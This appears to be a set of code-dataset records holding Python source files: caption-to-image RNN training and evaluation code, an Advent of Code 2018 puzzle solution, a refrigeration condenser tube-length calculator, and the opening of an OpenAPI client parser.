D.cosine_distance(Y_pred, Y) errors = 0 N = 0 for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] best = numpy.argsort(row) top5 = [ images[b]['imgid'] for b in best[:5] ] N = N+1 if imgid not in top5: errors = errors + 1 print errors, N, errors/N def train(args): zero_words = cPickle.load(gzip.open("zero_shot.pkl.gz")) if args.zero_shot else set() def maybe_zero(s, i): overlap = set(tokenize(s)).intersection(zero_words) if args.zero_shot and len(overlap) > 0: return numpy.zeros(i.shape) else: return i dataset = args.dataset tok_path = args.tokenizer model_path = args.model d = dp.getDataProvider(dataset) pairs = list(d.iterImageSentencePair(split='train')) if args.shuffle: numpy.random.shuffle(pairs) output_size = len(pairs[0]['image']['feat']) embedding_size = args.embedding_size if args.embedding_size is not None else args.hidden_size tokenizer = cPickle.load(gzip.open(args.init_tokenizer)) \ if args.init_tokenizer else Tokenizer(min_df=args.word_freq_threshold, character=args.character) sentences, images = zip(*[ (pair['sentence']['raw'], maybe_zero(pair['sentence']['raw'],pair['image']['feat'])) for pair in pairs ]) scaler = StandardScaler() if args.scaler == 'standard' else NoScaler() images = scaler.fit_transform(images) tokens = [ [tokenizer.encoder['PAD']] + sent + [tokenizer.encoder['END'] ] for sent in tokenizer.fit_transform(sentences) ] tokens_inp = [ token[:-1] for token in tokens ] tokens_out = [ token[1:] for token in tokens ] cPickle.dump(tokenizer, gzip.open(tok_path, 'w')) cPickle.dump(scaler, gzip.open('scaler.pkl.gz','w')) # Validation data valid_pairs = list(d.iterImageSentencePair(split='val')) valid_sents, valid_images = zip(*[ (pair['sentence']['raw'], pair['image']['feat']) for pair in valid_pairs ]) valid_images = scaler.transform(valid_images) valid_tokens = [ [ tokenizer.encoder['PAD'] ] + sent + [tokenizer.encoder['END'] ] for sent in tokenizer.transform(valid_sents) ] valid_tokens_inp = [ token[:-1] for token in valid_tokens ] valid_tokens_out = [ token[1:] for token in valid_tokens ] valid = (valid_tokens_inp, valid_tokens_out, valid_images) updater = passage.updates.Adam(lr=args.rate, clipnorm=args.clipnorm) if args.cost == 'MeanSquaredError': z_cost = MeanSquaredError elif args.cost == 'CosineDistance': z_cost = CosineDistance else: raise ValueError("Unknown cost") if args.hidden_type == 'gru': Recurrent = GatedRecurrent elif args.hidden_type == 'lstm': Recurrent = LstmRecurrent else: Recurrent = GatedRecurrent # if args.init_model is not None: # model_init = cPickle.load(open(args.init_model)) # def values(ps): # return [ p.get_value() for p in ps ] # # FIXME enable this for shared only embeddings # layers = [ Embedding(size=args.hidden_size, n_features=tokenizer.n_features, # weights=values(model_init.layers[0].params)), # Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation, # weights=values(model_init.layers[1].params)), # Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True, # weights=values(model_init.layers[2].left.params)), # right=Dense(size=output_size, activation=args.out_activation, # weights=values(model_init.layers[2].right.params)) # ) ] # else: # FIXME implement proper pretraining FIXME interpolated = True if not args.non_interpolated else False if args.model_type in ['add', 'mult', 'matrix']: if args.model_type == 'add': layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=Add) elif args.model_type == 'mult': layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=Mult) elif args.model_type == 'matrix': sqrt_size = embedding_size ** 0.5 if not sqrt_size.is_integer(): raise ValueError("Sqrt of embedding_size not integral for matrix model") layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=MatrixMult) layers = [ layer0, Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) elif args.model_type == 'simple': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) # FIXME need validation elif args.model_type == 'deep-simple': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) # FIXME need validation elif args.model_type == 'shared_all': if args.zero_shot: raise NotImplementedError # FIXME zero_shot not implemented layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True), right=Dense(size=output_size, activation=args.out_activation, reshape=False)) ] model = ForkedRNN(layers=layers, updater=updater, cost_y=CategoricalCrossEntropySwapped, cost_z=z_cost, alpha=args.alpha, size_y=tokenizer.n_features, verbose=1, interpolated=interpolated) model.fit(tokens_inp, tokens_out, images, n_epochs=args.iterations, batch_size=args.batch_size, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) elif args.model_type == 'shared_embeddings': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Combined(left=Stacked([Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Dense(size=tokenizer.n_features, activation='softmax', reshape=True)]), left_type='id', right=Stacked([Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False)]), right_type='id') ] model = ForkedRNN(layers=layers, updater=updater, cost_y=CategoricalCrossEntropySwapped, cost_z=z_cost, alpha=args.alpha, size_y=tokenizer.n_features, verbose=1, interpolated=interpolated, zero_shot=args.zero_shot) model.fit(tokens_inp, tokens_out, images, n_epochs=args.iterations, batch_size=args.batch_size, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) cPickle.dump(model, gzip.open(model_path,"w")) def test(args): if args.random_seed is not None: numpy.random.seed(args.random_seed) def scramble(words): ixs = range(len(words)) random.shuffle(ixs) return [ words[ix] for ix in ixs ] testInfo = {'argv': sys.argv, 'dataset': args.dataset, 'scramble': args.scramble, 'model_type': args.model_type, 'alpha': args.alpha, 'iter_predict': args.iter_predict, 'task': 'paraphrase' if args.paraphrase else 'image', 'items': []} D = Cdist() dataset = args.dataset suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) real_stdout = sys.stdout with open('/dev/null', 'w') as f: sys.stdout = f d = dp.getDataProvider(args.dataset) sys.stdout = real_stdout pairs = list(d.iterImageSentencePair(split='val')) inputs = [ scramble(s) if args.scramble else s for s in tokenizer.transform([ pair['sentence']['raw'] for pair in pairs]) ] if args.paraphrase: candidates = tokenizer.transform([ pair['sentence']['raw'] for pair in pairs]) # No scrambling of candidates if args.paraphrase_state == 'output_vis': preds = model.predict(inputs) candidates_pred = model.predict(candidates) elif args.paraphrase_state == 'hidden_text': preds, _ = predict_h(model, inputs) candidates_pred, _ = predict_h(model, candidates) elif args.paraphrase_state == 'hidden_vis' and hasattr(model.layers[1], 'left'): _, preds = predict_h(model, inputs) _, candidates_pred = predict_h(model, candidates) elif args.paraphrase_state == 'hidden_vis' and not hasattr(model.layers[1], 'left'): preds = predict_h_simple(model, inputs) candidates_pred = predict_h_simple(model, candidates) elif args.paraphrase_state == 'hidden_multi': preds = numpy.hstack(predict_h(model, inputs)) candidates_pred = numpy.hstack(predict_h(model, candidates)) else: raise ValueError("Unknown state") distances = D.cosine_distance(preds, candidates_pred) #distances = cdist(preds, candidates_pred, metric='cosine') N = 0 score = 0.0 imgids = numpy.array([ pair['sentence']['imgid'] for pair in pairs ]) sentids = numpy.array([ pair['sentence']['sentid'] for pair in pairs]) for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) rank = numpy.where((imgids[best] == imgid) * (sentids[best] != sentid))[0][0] + 1 top4 = [ pairs[b]['sentence']['imgid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4] # exclude self top4sent = [ pairs[b]['sentence']['sentid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4] score = score + sum([i == imgid for i in top4 ])/4.0 N = N+1 itemInfo = {'sentid':sentid, 'imgid': imgid, 'score': sum([i == imgid for i in top4 ])/4.0, 'rank': rank, 'topn': top4 , 'topnsentid': top4sent, 'input': tokenizer.inverse_transform([inputs[j]])[0]} testInfo['items'].append(itemInfo) print args.iter_predict, N, score/N else: preds = model.predict(inputs) images = list(d.iterImages(split='val')) distances = D.cosine_distance(preds, scaler.transform([image['feat'] for image in images ])) errors = 0 N = 0 imgids = numpy.array([ img['imgid'] for img in images ]) for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) rank = numpy.where(imgids[best] == imgid)[0][0] + 1 top5 = [ images[b]['imgid'] for b in best[:5] ] N = N+1 if imgid not in top5: errors = errors + 1 itemInfo = {'sentid':sentid, 'imgid': imgid, 'score': float(imgid in top5), 'rank': rank, 'topn': top5, 'input':tokenizer.inverse_transform([inputs[j]])[0] } testInfo['items'].append(itemInfo) print args.iter_predict, errors, N, errors/N testInfoPath = 'testInfo-task={0}-scramble={1}-iter_predict={2}.json.gz'.format(testInfo['task'], testInfo['scramble'], testInfo['iter_predict']) json.dump(testInfo, gzip.open(testInfoPath,'w')) def project_words(args): suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) exclude = ['PAD','END','UNK'] words, indexes = zip(*[ (w,i) for (w,i) in tokenizer.encoder.iteritems() if w not in exclude ]) inputs = [ [tokenizer.encoder['PAD'], i, tokenizer.encoder['END']] for i in indexes ] # FIXME actually for training we don't have END preds = scaler.inverse_transform(model.predict(inputs)) proj = dict((words[i], preds[i]) for i in range(0, len(words))) cPickle.dump(proj, gzip.open("proj.pkl.gz" + suffix, "w")) def extract_embeddings(args): tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) #scaler = cPickle.load(open('scaler.pkl')) suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) embeddings = model.layers[0].params[0].get_value() table = dict((word, embeddings[i]) for i,word in tokenizer.decoder.iteritems() if word not in ['END','PAD','UNK'] ) cPickle.dump(table, gzip.open('embeddings.pkl.gz' + suffix, 'w')) class Cdist(): def __init__(self): self.U = T.matrix('U') self.V = T.matrix('V') self.U_norm = self.U / self.U.norm(2, axis=1).reshape((self.U.shape[0], 1)) self.V_norm = self.V / self.V.norm(2, axis=1).reshape((self.V.shape[0], 1)) self.W = T.dot(self.U_norm, self.V_norm.T) self.cosine = theano.function([self.U, self.V], self.W) def cosine_distance(self, A, B): return 1 - self.cosine(A, B) main()
en
0.501562
#!/usr/bin/env python #, Dense # With pairs we'd get duplicate images! # candidates are identical to Y_pred #distances = D.cosine_distance(Y_pred, Y_pred) # exclude self # Validation data # if args.init_model is not None: # model_init = cPickle.load(open(args.init_model)) # def values(ps): # return [ p.get_value() for p in ps ] # # FIXME enable this for shared only embeddings # layers = [ Embedding(size=args.hidden_size, n_features=tokenizer.n_features, # weights=values(model_init.layers[0].params)), # Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation, # weights=values(model_init.layers[1].params)), # Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True, # weights=values(model_init.layers[2].left.params)), # right=Dense(size=output_size, activation=args.out_activation, # weights=values(model_init.layers[2].right.params)) # ) ] # else: # FIXME implement proper pretraining FIXME # FIXME need validation # FIXME need validation # FIXME zero_shot not implemented # No scrambling of candidates #distances = cdist(preds, candidates_pred, metric='cosine') # exclude self # FIXME actually for training we don't have END #scaler = cPickle.load(open('scaler.pkl'))
1.973251
2
2018/day-02/day2.py
smolsbs/aoc
1
6623585
<reponame>smolsbs/aoc<filename>2018/day-02/day2.py<gh_stars>1-10 import sys import itertools with open('input', 'r') as fp: data = [x.strip('\n') for x in fp.readlines()] def part1(data): a, b = 0, 0 for line in data: s = {} for ch in line: if ch not in s: s[ch] = 1 else: s[ch] += 1 if 2 in s.values(): a +=1 if 3 in s.values(): b += 1 return a*b def part2(data): combs = list(itertools.combinations(data, 2)) ssize = len(combs[0][0]) # length of any string for c in combs: common = "" diff = 0 for i in range(ssize): if c[0][i] == c[1][i]: common += c[0][i] else: diff +=1 if diff > 1: break if diff == 1: return common print(part1(data)) print(part2(data))
import sys import itertools with open('input', 'r') as fp: data = [x.strip('\n') for x in fp.readlines()] def part1(data): a, b = 0, 0 for line in data: s = {} for ch in line: if ch not in s: s[ch] = 1 else: s[ch] += 1 if 2 in s.values(): a +=1 if 3 in s.values(): b += 1 return a*b def part2(data): combs = list(itertools.combinations(data, 2)) ssize = len(combs[0][0]) # length of any string for c in combs: common = "" diff = 0 for i in range(ssize): if c[0][i] == c[1][i]: common += c[0][i] else: diff +=1 if diff > 1: break if diff == 1: return common print(part1(data)) print(part2(data))
en
0.393049
# length of any string
3.11987
3
Condenser_Designer.py
li-fulin/Refrigeration-Condenser-Desginer
0
6623586
import CoolProp.CoolProp as CP import numpy as np import matplotlib.pyplot as plt import pandas as pd # Constant Parameters RC = 80 #kW Tevap = 5 #Degree Celsius Tcond = 45 #Degree Celsius Twi = 30 #Water inlet temp; Degree Celsius Twe = 35 #Water outlet temp; Degree Celsius Do = 0.016 #Pipe outer diameter; m Di = 0.014 #Pipe inner diameter; m HRR = 1.27 #Heat Rejection Ratio; Qcond/Qevap k_pipe = 390 #Thermal conductivity of copper; J/mK N = 42 #number of pipes Pass = 2 #number of pass refrigerant = 'R134a' #refrigerant V_flow = 13 #Number of vertical flow # Iteration Variable delta_T = 5 #Assumed delta T T_array = np.arange(35.01,45.01,0.01) #Array of Condenser Temperature T = np.flip(T_array) #Flipped Condenser Array def Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant): ''' This function computes the actual temperature difference and the condenser tube length given condenser temperature as input Parameters: Tevap - Evaporator Temperature Tcond - Condenser Temperature Twi - Water inlet Temperature Twe - Water outlet Temperature Do - Pipe outer diameter Di - Pipe inner diameter HRR - Heat Rejection Ratio k_pipe - Pipe thermal conductivity N - Number of pipes Pass - Number of Bends + 1 V_flow - Number of fluid flow perpendicular to pipe delta_T - Temperature Difference refrigerant - Name of the Refrigerant Return: delta_T_prime - Converged Temperature Difference L_tube - Condenser Tube Length Pcond - Condenser Pressure ''' # Refrigerant Side Tcond_K = Tcond +273.15 #Kelvin Pcond = CP.PropsSI('P','T',Tcond_K,'Q',0,refrigerant)/1000 #@Tcond and Q=0; kPa N_effective = (N/V_flow) k_ref = CP.PropsSI('CONDUCTIVITY','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 rho_ref = CP.PropsSI('D','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 hfg = CP.PropsSI('H','T',Tcond_K,'Q',1,refrigerant) - CP.PropsSI('H','T',Tcond_K,'Q',0,refrigerant) #J/kg mu_ref = CP.PropsSI('V','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 Numerator = (k_ref**3)*(rho_ref**2)*9.81*hfg Denominator = (N_effective*mu_ref*delta_T*Do) h_refrigerant = 0.725*((Numerator/Denominator)**0.25) # Conduction in pipe delta_x = (Do-Di)/2 h_pipe = delta_x/k_pipe # Fouling Factor h_fouling = 0.000176 # Convection in Water T_bulkmean = (Twi+Twe)/2 #Degree Celsius T_bulkmean_K = T_bulkmean + 273.15 #Kelvin P_water = 101325 #Pascal Cp_water = CP.PropsSI('C','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water k_water = CP.PropsSI('CONDUCTIVITY','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water mu_water = CP.PropsSI('V','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water rho_water = CP.PropsSI('D','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water Q_cond = HRR*RC*1000 #Heat Rejection m_water = Q_cond/(Cp_water*(Twe-Twi)) #Total mass flow rate m_pipe = m_water/(N/Pass) #mass flow per pipe U = m_pipe/(rho_water*(np.pi*(Di**2)*0.25)) #Flow rate/ Flow velocity h_water = Dittus_Boelter(Di,k_water,U,rho_water,mu_water,Cp_water) #Enthalpy Water # Heat calculation R_refrigerant = 1/(h_refrigerant*np.pi*Do) #Thermal Resistance for Refrigerant; 1/(hA) R_pipe = (h_pipe)/(np.pi*(0.5*(Do+Di))) #Thermal Resistance for Pipe; delta x/(kA) R_fouling = h_fouling/(np.pi*Di) #Thermal Resistance for Fouling Factor; 1/(hA) R_water = 1/(h_water*np.pi*Di) #Thermal Resistance for Water; 1/(hA) R_total = R_refrigerant+R_pipe+R_fouling+R_water #Totla Thermal Resistance LMTD = ((Tcond-Twe)-(Tcond-Twi))/np.log((Tcond-Twe)/(Tcond-Twi)) #Log Mean Temperature Difference L_total = (Q_cond*R_total)/LMTD #Total condenser length L_tube = L_total/N #Length per tube delta_T_prime = Q_cond/(h_refrigerant*np.pi*Do*L_tube*N) #New delta T # print to debug ''' print(f'h refrigerant: {h_refrigerant}') print(f'h pipe: {h_pipe}') print(f'h fouling: {h_fouling}') print(f'h water: {h_water}') print(f'mass flow: {m_water}') print(f'Delta T: {delta_T_prime}') print(f'Total Length: {L_total}') print(f'Length per tube: {L_tube}\n') ''' return delta_T_prime, L_tube, Pcond def Dittus_Boelter(Di,k_water,U,rho,mu_water,Cp_water): ''' This is the Dittus-Boelter Equation used to relate water enthalpy Nu = K*(Re**m)*(Pr**n) Parameters: Di - Pipe inner diameter k_water - Fluid thermal conductivity U - Fluid flow rate rho - Fluid Density mu_water - Fluid viscosity Cp_water - Constant pressure specific heat Return: h_water - Fluid enthalpy''' Re = (Di*U*rho/mu_water) #Reynold's Number Pr = ((Cp_water*mu_water)/k_water) #Prandlt Number Nu = 0.023*((Re**0.8)*(Pr*0.4)) #Nusselt Number return (k_water*Nu)/Di def iterator(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant): ''' This function iterates until the temperature difference converge with 1% error ''' Dt, L_tube, Pcond = Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) tolerance = 0.01 max_iter = 1000 counter = 0 while counter < max_iter: if abs(Dt-delta_T) > tolerance: counter += 1 delta_T = Dt Dt, L_tube, Pcond = Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) else: break return Pcond, L_tube, Dt P = [] #List for Pressure L = [] #List for Tube Lengths DT =[] #list for temperature difference for t in T: p, l, dt= iterator(Tevap, t, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) P.append(p) L.append(l) DT.append(dt) title = refrigerant+' Condenser Pressure vs Condenser Tube Length' #Plot title data = {'Condenser Temperature (C)':T, 'Condenser Pressure (kPa)':P, 'Condenser Tube Length (m)':L, 'Temperature Difference':DT} df = pd.DataFrame(data) # Exporting data to csv file filename = refrigerant + ' Tube Length Data.csv' #CSV file name df.to_csv(filename, index=False) # Plotting the data plt.plot(L,P) plt.xlabel('Condenser Tube Length (m)') plt.ylabel('Condenser Pressure (kPa)') plt.title(title) plt.show()
import CoolProp.CoolProp as CP import numpy as np import matplotlib.pyplot as plt import pandas as pd # Constant Parameters RC = 80 #kW Tevap = 5 #Degree Celsius Tcond = 45 #Degree Celsius Twi = 30 #Water inlet temp; Degree Celsius Twe = 35 #Water outlet temp; Degree Celsius Do = 0.016 #Pipe outer diameter; m Di = 0.014 #Pipe inner diameter; m HRR = 1.27 #Heat Rejection Ratio; Qcond/Qevap k_pipe = 390 #Thermal conductivity of copper; J/mK N = 42 #number of pipes Pass = 2 #number of pass refrigerant = 'R134a' #refrigerant V_flow = 13 #Number of vertical flow # Iteration Variable delta_T = 5 #Assumed delta T T_array = np.arange(35.01,45.01,0.01) #Array of Condenser Temperature T = np.flip(T_array) #Flipped Condenser Array def Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant): ''' This function computes the actual temperature difference and the condenser tube length given condenser temperature as input Parameters: Tevap - Evaporator Temperature Tcond - Condenser Temperature Twi - Water inlet Temperature Twe - Water outlet Temperature Do - Pipe outer diameter Di - Pipe inner diameter HRR - Heat Rejection Ratio k_pipe - Pipe thermal conductivity N - Number of pipes Pass - Number of Bends + 1 V_flow - Number of fluid flow perpendicular to pipe delta_T - Temperature Difference refrigerant - Name of the Refrigerant Return: delta_T_prime - Converged Temperature Difference L_tube - Condenser Tube Length Pcond - Condenser Pressure ''' # Refrigerant Side Tcond_K = Tcond +273.15 #Kelvin Pcond = CP.PropsSI('P','T',Tcond_K,'Q',0,refrigerant)/1000 #@Tcond and Q=0; kPa N_effective = (N/V_flow) k_ref = CP.PropsSI('CONDUCTIVITY','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 rho_ref = CP.PropsSI('D','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 hfg = CP.PropsSI('H','T',Tcond_K,'Q',1,refrigerant) - CP.PropsSI('H','T',Tcond_K,'Q',0,refrigerant) #J/kg mu_ref = CP.PropsSI('V','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 Numerator = (k_ref**3)*(rho_ref**2)*9.81*hfg Denominator = (N_effective*mu_ref*delta_T*Do) h_refrigerant = 0.725*((Numerator/Denominator)**0.25) # Conduction in pipe delta_x = (Do-Di)/2 h_pipe = delta_x/k_pipe # Fouling Factor h_fouling = 0.000176 # Convection in Water T_bulkmean = (Twi+Twe)/2 #Degree Celsius T_bulkmean_K = T_bulkmean + 273.15 #Kelvin P_water = 101325 #Pascal Cp_water = CP.PropsSI('C','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water k_water = CP.PropsSI('CONDUCTIVITY','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water mu_water = CP.PropsSI('V','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water rho_water = CP.PropsSI('D','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water Q_cond = HRR*RC*1000 #Heat Rejection m_water = Q_cond/(Cp_water*(Twe-Twi)) #Total mass flow rate m_pipe = m_water/(N/Pass) #mass flow per pipe U = m_pipe/(rho_water*(np.pi*(Di**2)*0.25)) #Flow rate/ Flow velocity h_water = Dittus_Boelter(Di,k_water,U,rho_water,mu_water,Cp_water) #Enthalpy Water # Heat calculation R_refrigerant = 1/(h_refrigerant*np.pi*Do) #Thermal Resistance for Refrigerant; 1/(hA) R_pipe = (h_pipe)/(np.pi*(0.5*(Do+Di))) #Thermal Resistance for Pipe; delta x/(kA) R_fouling = h_fouling/(np.pi*Di) #Thermal Resistance for Fouling Factor; 1/(hA) R_water = 1/(h_water*np.pi*Di) #Thermal Resistance for Water; 1/(hA) R_total = R_refrigerant+R_pipe+R_fouling+R_water #Totla Thermal Resistance LMTD = ((Tcond-Twe)-(Tcond-Twi))/np.log((Tcond-Twe)/(Tcond-Twi)) #Log Mean Temperature Difference L_total = (Q_cond*R_total)/LMTD #Total condenser length L_tube = L_total/N #Length per tube delta_T_prime = Q_cond/(h_refrigerant*np.pi*Do*L_tube*N) #New delta T # print to debug ''' print(f'h refrigerant: {h_refrigerant}') print(f'h pipe: {h_pipe}') print(f'h fouling: {h_fouling}') print(f'h water: {h_water}') print(f'mass flow: {m_water}') print(f'Delta T: {delta_T_prime}') print(f'Total Length: {L_total}') print(f'Length per tube: {L_tube}\n') ''' return delta_T_prime, L_tube, Pcond def Dittus_Boelter(Di,k_water,U,rho,mu_water,Cp_water): ''' This is the Dittus-Boelter Equation used to relate water enthalpy Nu = K*(Re**m)*(Pr**n) Parameters: Di - Pipe inner diameter k_water - Fluid thermal conductivity U - Fluid flow rate rho - Fluid Density mu_water - Fluid viscosity Cp_water - Constant pressure specific heat Return: h_water - Fluid enthalpy''' Re = (Di*U*rho/mu_water) #Reynold's Number Pr = ((Cp_water*mu_water)/k_water) #Prandlt Number Nu = 0.023*((Re**0.8)*(Pr*0.4)) #Nusselt Number return (k_water*Nu)/Di def iterator(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant): ''' This function iterates until the temperature difference converge with 1% error ''' Dt, L_tube, Pcond = Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) tolerance = 0.01 max_iter = 1000 counter = 0 while counter < max_iter: if abs(Dt-delta_T) > tolerance: counter += 1 delta_T = Dt Dt, L_tube, Pcond = Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) else: break return Pcond, L_tube, Dt P = [] #List for Pressure L = [] #List for Tube Lengths DT =[] #list for temperature difference for t in T: p, l, dt= iterator(Tevap, t, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) P.append(p) L.append(l) DT.append(dt) title = refrigerant+' Condenser Pressure vs Condenser Tube Length' #Plot title data = {'Condenser Temperature (C)':T, 'Condenser Pressure (kPa)':P, 'Condenser Tube Length (m)':L, 'Temperature Difference':DT} df = pd.DataFrame(data) # Exporting data to csv file filename = refrigerant + ' Tube Length Data.csv' #CSV file name df.to_csv(filename, index=False) # Plotting the data plt.plot(L,P) plt.xlabel('Condenser Tube Length (m)') plt.ylabel('Condenser Pressure (kPa)') plt.title(title) plt.show()
en
0.583195
# Constant Parameters #kW #Degree Celsius #Degree Celsius #Water inlet temp; Degree Celsius #Water outlet temp; Degree Celsius #Pipe outer diameter; m #Pipe inner diameter; m #Heat Rejection Ratio; Qcond/Qevap #Thermal conductivity of copper; J/mK #number of pipes #number of pass #refrigerant #Number of vertical flow # Iteration Variable #Assumed delta T #Array of Condenser Temperature #Flipped Condenser Array This function computes the actual temperature difference and the condenser tube length given condenser temperature as input Parameters: Tevap - Evaporator Temperature Tcond - Condenser Temperature Twi - Water inlet Temperature Twe - Water outlet Temperature Do - Pipe outer diameter Di - Pipe inner diameter HRR - Heat Rejection Ratio k_pipe - Pipe thermal conductivity N - Number of pipes Pass - Number of Bends + 1 V_flow - Number of fluid flow perpendicular to pipe delta_T - Temperature Difference refrigerant - Name of the Refrigerant Return: delta_T_prime - Converged Temperature Difference L_tube - Condenser Tube Length Pcond - Condenser Pressure # Refrigerant Side #Kelvin #@Tcond and Q=0; kPa #@Tcond and Q=0 #@Tcond and Q=0 #J/kg #@Tcond and Q=0 # Conduction in pipe # Fouling Factor # Convection in Water #Degree Celsius #Kelvin #Pascal #@Tbulkmean and P water #@Tbulkmean and P water #@Tbulkmean and P water #@Tbulkmean and P water #Heat Rejection #Total mass flow rate #mass flow per pipe #Flow rate/ Flow velocity #Enthalpy Water # Heat calculation #Thermal Resistance for Refrigerant; 1/(hA) #Thermal Resistance for Pipe; delta x/(kA) #Thermal Resistance for Fouling Factor; 1/(hA) #Thermal Resistance for Water; 1/(hA) #Totla Thermal Resistance #Log Mean Temperature Difference #Total condenser length #Length per tube #New delta T # print to debug print(f'h refrigerant: {h_refrigerant}') print(f'h pipe: {h_pipe}') print(f'h fouling: {h_fouling}') print(f'h water: {h_water}') print(f'mass flow: {m_water}') print(f'Delta T: {delta_T_prime}') print(f'Total Length: {L_total}') print(f'Length per tube: {L_tube}\n') This is the Dittus-Boelter Equation used to relate water enthalpy Nu = K*(Re**m)*(Pr**n) Parameters: Di - Pipe inner diameter k_water - Fluid thermal conductivity U - Fluid flow rate rho - Fluid Density mu_water - Fluid viscosity Cp_water - Constant pressure specific heat Return: h_water - Fluid enthalpy #Reynold's Number #Prandlt Number #Nusselt Number This function iterates until the temperature difference converge with 1% error #List for Pressure #List for Tube Lengths #list for temperature difference #Plot title # Exporting data to csv file #CSV file name # Plotting the data
3.236319
3
openapi_python_client/openapi_parser/openapi.py
acgray/openapi-python-client
0
6623587
from __future__ import annotations from dataclasses import dataclass, field from enum import Enum from typing import Any, Dict, Generator, Iterable, List, Optional, Set from .errors import ParseError from .properties import EnumProperty, ListProperty, Property, property_from_dict from .reference import Reference from .responses import ListRefResponse, RefResponse, Response, response_from_dict class ParameterLocation(str, Enum): """ The places Parameters can be put when calling an Endpoint """ QUERY = "query" PATH = "path" def import_string_from_reference(reference: Reference, prefix: str = "") -> str: """ Create a string which is used to import a reference """ return f"from {prefix}.{reference.module_name} import {reference.class_name}" @dataclass class EndpointCollection: """ A bunch of endpoints grouped under a tag that will become a module """ tag: str endpoints: List[Endpoint] = field(default_factory=list) relative_imports: Set[str] = field(default_factory=set) parse_errors: List[ParseError] = field(default_factory=list) @staticmethod def from_dict(d: Dict[str, Dict[str, Dict[str, Any]]]) -> 